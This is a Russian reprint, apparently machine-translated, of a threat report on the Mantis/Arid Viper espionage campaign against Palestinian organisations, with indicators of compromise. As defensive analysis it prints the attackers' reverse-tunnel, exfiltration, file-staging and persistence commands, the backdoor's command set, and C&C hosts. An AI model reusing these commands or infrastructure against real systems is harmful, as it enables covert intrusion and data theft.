Mantis: новый инструмент, используемый при атаках на палестинские объекты

Шпионские группы тратят время и усилия на то, чтобы избежать обнаружения и сохраниться в взломанных сетях.
Группа кибершпионажа Mantis (также известная как Arid Viper, Desert Falcon, APT-C-23), представляющая угрозу, предположительно действующая на палестинских территориях, проводит постоянные атаки, применяя обновленный набор инструментов и не жалея усилий для нападения на цели. постоянное присутствие в сети.
Группа известна своими нападениями на организации на Ближнем Востоке, но недавняя активность, обнаруженная Symantec, дочерней компанией Broadcom Software, ориентирована на организации на палестинских территориях. Вредоносная деятельность началась в сентябре 2022 года и продолжалась как минимум до февраля 2023 года. луна. Подобные нападения не являются беспрецедентными для группировки Mantis, которая ранее сообщала о нападениях на лиц, находящихся на палестинских территориях, в 2017 году.

контексты

Mantis ведет активную деятельность с 2014 года, но некоторые сторонние источники сообщают, что она могла действовать еще в 2011 году. Группа известна тем, что атакует организации в Израиле и некоторых других странах Ближнего Востока. Среди целей - правительство, вооруженные силы, финансы, СМИ, образование, энергетика и аналитические центры. Группа известна тем, что использует фишинговые письма и фальшивые профили в социальных сетях, чтобы заманивать цели и устанавливать на их устройства вредоносное ПО.

Широко распространено мнение, что Mantis связана с палестинскими территориями. Symantec не может точно определить принадлежность к какой-либо палестинской организации, хотя другие производители связывают эту группу с ХАМАС.

В своей последней атаке группа использовала обновленные версии бэкдоров Micropsia и Arid Gopher для заражения целей, а затем широкомасштабную кражу учетных данных и утечку похищенных данных.

цепь атак

Первоначальный путь заражения в этой кампании неясен. В одной из организаций, ставшей объектом атаки, злоумышленники развернули три разные версии одного и того же набора инструментов (т. е. разные варианты одного и того же инструмента) на трех наборах компьютеров. Изолирование атаки таким образом, вероятно, является мерой предосторожности. Если один из наборов инструментов будет обнаружен, злоумышленник все равно сможет сохранить свое постоянное присутствие в целевой сети.

Ниже приведено описание использования одного из трех наборов инструментов:

Вредоносная активность была впервые обнаружена 18 декабря 2022 года. Три отдельных набора обфусцированных команд PowerShell выполнялись для загрузки Base64-кодированной строки, которая запускала встроенный шеллкод. шеллкод - это 32-битный загрузчик, который использует базовый протокол TCP для загрузки шеллкода с сервера Command and Control (C&C): 104.194.222[...] 50 порт 4444 для загрузки другого этапа.

Злоумышленники вернулись 19 декабря, сначала выполнив дамп учетных данных, а затем используя Certutil и BITSAdmin для загрузки бэкдора Micropsia и Putty, общедоступного SSH-клиента.

Затем Micropsia была запущена и начала связываться с C&C-сервером. В тот же день Micropsia была запущена еще на трех машинах в той же организации. В каждом случае она запускалась в папке, названной по имени файла:

csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
На одном из компьютеров с помощью Micropsia был создан обратный socks-туннель к внешнему IP-адресу:

CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.] 50:443 [отредактировано]

20 декабря с помощью Micropsia на одном из зараженных компьютеров был запущен неизвестный исполняемый файл windowspackages.exe.

На следующий день, 21 декабря, RAR был запущен для архивации файлов на другом зараженном компьютере.

С 22 декабря по 2 января 2023 года Micropsia использовалась для запуска бэкдора Arid Gopher на трех зараженных компьютерах. Arid Gopher, в свою очередь, использовался для запуска инструмента SetRegRunKey.exe, который обеспечивает выполнение Arid Gopher при перезагрузке путем добавления его в реестр для обеспечения постоянство. Он также запускает неизвестный файл с именем localsecuritypolicy.exe (злоумышленник использует это имя в других местах в качестве бэкдора Arid Gopher).

28 декабря Micropsia использовалась для запуска windowspackages.exe на трех других зараженных компьютерах.

31 декабря Arid Gopher выполнил на двух зараженных компьютерах два неизвестных файла с именами networkswitcherdatamodell.exe и networkuefidiagsbootserver.exe.

К 2 января злоумышленники деактивировали использовавшуюся ими версию Arid Gopher и внедрили новый вариант. Было ли это связано с тем, что первая версия была обнаружена, или со стандартной операционной процедурой, пока неясно.

4 января с помощью Micropsia на одном компьютере были запущены два неизвестных файла, оба с именем hostupbroker.exe, из папки: csidl_common_appdata\hostupbroker\hostupbroker.exe. За этим сразу же последовала утечка RAR-файла:

CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar

9 января Arid Gopher был использован для выполнения двух неизвестных файлов на одном компьютере:

csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embeddedmodeservice\embeddedmodeservice.exe
Последняя вредоносная активность наблюдалась после 12 января, когда Arid Gopher использовался для выполнения неизвестного файла с именем localsecuritypolicy.exe каждые десять часов.

Micropsia

Вариант бэкдора Micropsia, использовавшийся в этих атаках, похоже, является слегка обновленной версией версии, замеченной другими производителями. В этой кампании Micropsia была развернута с использованием нескольких имен файлов и путей к ним:

csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia использует WMI для выполнения, и его основная цель, по-видимому, заключается в запуске вторичных полезных нагрузок злоумышленника. К ним относятся:

Arid Gopher (имена файлов: networkvirtualisationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
Туннелер обратных SOCKs (он же Revsocks) (имя файла: windowsservicemanageav.exe)
Инструмент для эксфильтрации данных (имя файла: windowsupserv.exe)
Два неизвестных файла, оба с именем hostupbroker.exe
Неизвестное имя файла windowspackages.exe
Кроме того, Micropsia имеет свои собственные функции, такие как скриншоты, кейлоггинг и архивирование определенных типов файлов с помощью WinRAR для подготовки к утечке данных:

"%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe" a-r -ep1 -v2500k -. hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PROGRAMDATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41" "%USERPROFILE%*.xls" " %USERPROFILE%*.xlsx" "%USERPROFILE%*.doc" "%USERPROFILE%*. docx" "%USERPROFILE%*.csv" "%USERPROFILE%*.pdf" "%USERPROFILE%*.ppt" "%USERPROFILE%*.pptx" " %USERPROFILE%*.odt" "%USERPROFILE%*.mdb" "%USERPROFILE%*. accdb" "%USERPROFILE%*.accde" "%USERPROFILE%*.txt" "%USERPROFILE%*.rtf" "%USERPROFILE%*.vcf"

Засушливый суслик

В отличие от Micropsia, которая написана на Delphi, Arid Gopher написан на Go. Версия Arid Gopher, используемая в этой кампании, содержит следующие встроенные компоненты:

7za.exe - легальная копия исполняемого файла 7-Zip
AttestationWmiProvider.exe - инструмент для установки значения "Run" в реестре
ServiceHubIdentityHost.exe - копия легального исполняемого файла Shortcut.exe от Optimum X.
Setup.env - файл конфигурации
Arid Gopher также используется для запуска следующих неизвестных файлов: networkswitcherdatamodell.exe, localsecuritypolicy.exe и networkuefidiagsbootserver.exe, а также для загрузки и выполнения файлов, обфусцированных с помощью Обфусцированные файлы PyArmor.

При общении с C&C-сервером Arid Gopher регистрирует устройство по одному пути, а затем подключается к другому, возможно, для получения команд:

Подключение к: http://jumpstartmail[.] com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.] 134) - возможно, для регистрации устройства
Далее следует: http://jumpstartmail[...] com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - вероятно, для того, чтобы получить команду
Подключение к: http://salimafia[.] net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.] 32) - Возможно, для регистрации устройства
Далее следует: http://salimafia[...] net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - вероятно, для того, чтобы получить команду

Судя по всему, Arid Gopher регулярно обновляется и переписывается злоумышленниками, вероятно, чтобы избежать обнаружения. Один из вариантов вредоносной программы настолько отличается от уникального кода предыдущих версий, что ни одна из подпрограмм не содержит того же уникального кода, что и предыдущая версия. Похоже, что Mantis активно переставляет логику между вариантами, что является трудоемкой операцией, если делать это вручную.

Команда Описание
"c" Возможно, это связано с main.exC("cmd").
"d" Возможно, связано с main.down2
"s" Возможно, связано с main.OnDSH
"ci" Возможно, связано с main.deviceProperties
"ps" Возможно, это связано с main.exC("powershell")
"ра" Возможно, это связано с main.RunAWithoutW
"sf" Возможно, связано с main.updateSettings
"sl" Возможно, связано с main.searchForLogs
"ua" Возможно, связано с main.updateApp
"ut" Возможно, связано с main.updateT
"pwnr" Возможно, это связано с main.exCWithoutW("powershell")
"рапп" Возможно, это связано с main.restartApp
"гелог" Возможно, связано с main.upAppLogs
"ufbtt" Возможно, это связано с main.collectFi
"ufofd" Возможно, связано с main.collectFiOrFol
"bwp" Возможно, связано с main.browDat
"cbh" Возможно, связано с main.delBD
"cwr" Возможно, это связано с main.exCWithoutW("cmd").
"гаф" Возможно, это связано с main.collectFi
"ntf" Возможно, связано с main.collectNet
"смр" Возможно, связано с main.updateSettings

Встроенный файл setup.env используется анализируемым вариантом Arid Gopher для получения конфигурационных данных и содержит следующее:

DIR=WindowsPerceptionService

ENDPOINT=http://jumpstartmail[.] com/IURTIER3BNV4ER

LOGS=logs.txt

DID=code.txt

VER=6.1

EN=2

ST_METHOD=r

ST_MACHINE=false

ST_FLAGS=x

КОМПРЕССОР=7za.exe

DDIR=ResourcesFiles

BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002

SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB

STAPP=AttestationWmiProvider.exe

SHORT_APP=ServiceHubIdentityHost.exe

Файл конфигурации setup.env ссылается на другой файл, AttestationWmiProvider.exe, также встроенный в Arid Gopher. Этот файл представляет собой 32-битный исполняемый файл, используемый в качестве помощника для обеспечения запуска другого исполняемого файла при перезагрузке. При запуске он проверяет следующие параметры командной строки:

"ключ" со строковым аргументом [RUN_VALUE_NAME]

"значение" со строковым аргументом [RUN_PATHNAME]

Затем он организует получение уведомления от сигнала с помощью функции func os/signal.Notify(). Получив уведомление, он устанавливает следующее значение реестра:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "[RUN_VALUE_NAME]" = "[RUN_ PATHNAME]"

Наши исследования показали, что этот файл устанавливает Arid Gopher на запуск при перезагрузке:

CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualisationStartService "-value= CSIDL_COMMON_APPDATA\networkvirtualisationstartservice\networkvirtualizationstartservice.exe -x"

инструмент для борьбы с утечкой данных

Злоумышленники также использовали специальный инструмент для утечки данных, украденных у целевой организации: 64-битный исполняемый файл PyInstaller под названием WindowsUpServ.exe. При запуске инструмент проверяет наличие следующих параметров командной строки:

"-d" "[FILE_DIRECTORY]"

"-f" "[FILENAME]"

Для каждого аргумента командной строки "-f" "[FILENAME]" инструмент загружает содержимое папки [FILENAME]. Для каждого аргумента командной строки "-d" "[FILE_DIRECTORY]" инструмент получает список файлов, хранящихся в папке [FILE_DIRECTORY], и загружает содержимое каждого из них.

При загрузке каждого файла инструмент отправляет HTTP POST-запрос на C&C-сервер со следующими параметрами:

"kjdfnqweb": [THE_FILE_CONTENT]

"qyiwekq": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]

Если удаленный сервер отвечает кодом состояния 200, вредоносная программа удаляет загруженные файлы с локального диска. Вредоносная программа также может записывать некоторые из своих действий в следующие файлы:

"C:\ProgramData\WindowsUpServ\success.txt"

"C:\ProgramData\WindowsUpServ\err.txt"

Решительный соперник

Судя по всему, Mantis - решительный противник, готовый тратить время и силы на то, чтобы максимально увеличить свои шансы на успех, о чем свидетельствуют обширная переработка вредоносного ПО и его способность разделять атаки на отдельные организации на несколько отдельных частей, чтобы снизить вероятность обнаружения всей операции.

Показатели МОК

хэш SHA256 Имя файла Описание
0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 networkvirtualizationservice.exe Засушливый суслик
3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 networkvirtualisationpicservice.exe Засушливый суслик
82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 networkvirtualisationfiaservice.exe Засушливый суслик
85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 networkvirtualisationinithservice.exe Засушливый суслик
cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 networkvirtualisationfiaservice.exe Засушливый суслик
f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 networkvirtualisationstartservice.exe Засушливый суслик
21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 AttestationWmiProvider.exe Компонент постоянства Arid Gopher
58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 windowsupserv.exe Инструмент эксфильтрации
5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e windowsupserv.exe Инструмент эксфильтрации
0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 Разное Micropsia
1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa Н/Д Micropsia
211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d xboxaccessorymanagementservice.exe Micropsia
d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 systempropertiesinternationaltime.exe Micropsia
5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 networkvirtualisationseoservice.exe Возможный засушливый суслик
f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 runme.exe Возможный измерительный прибор
c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b systempropertiesinternationaltime.exe Возможна микропсия
f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb windowsservicemanageav.exe ReverseSocksTunnel
411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 Н/Д Shellcode
5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d Н/Д Shellcode
6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 Н/Д Shellcode
11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e SystemPropertiesInternationalTime.rar Неизвестный файл
1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 networkswitcherdatamodell.exe Неизвестный файл
220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c hostupbroker.exe Неизвестный файл
4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f hostupbroker.exe Неизвестный файл
4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 windowspackages.exe Неизвестный файл
624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 _pytransform.dll Неизвестный файл
7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 embeddedmodeservice.exe Неизвестный файл
8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 localsecuritypolicy.exe Неизвестный файл
b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 embeddedmodeservice.exe Неизвестный файл
bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 localsecuritypolicy.exe Неизвестный файл
bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 networkuefidiagsbootserver.exe Неизвестный файл
d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 teamviewrremoteservice.exe Неизвестный файл
jumpstartmail[.] com Засушливый суслик C&C
paydayloansnew[.] com Засушливый суслик C&C
картинный мир[.] информация Засушливый суслик C&C
rnacgroup[.] com C&C
salimafia[...] сеть Засушливый суслик C&C
seomoi[...] net Засушливый суслик C&C
soft-utils[.] com C&C
chloe-boreman[.] com Микропсия C&C
criston-cole[.] com Микропсия C&C
http://5.182.39[.] 44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu Инструмент эксфильтрации C&C

 

Оригинальная статья написана Chief Security Officer, при воспроизведении просьба указывать: https://cncso.com/ru/богомол-использовался-в-атаках-на-пал.

Нравиться (1)
Предыдущий 29 ноября 2023 пп10:01
Следующий 3 декабря 2023 дп9:11

связанное предложение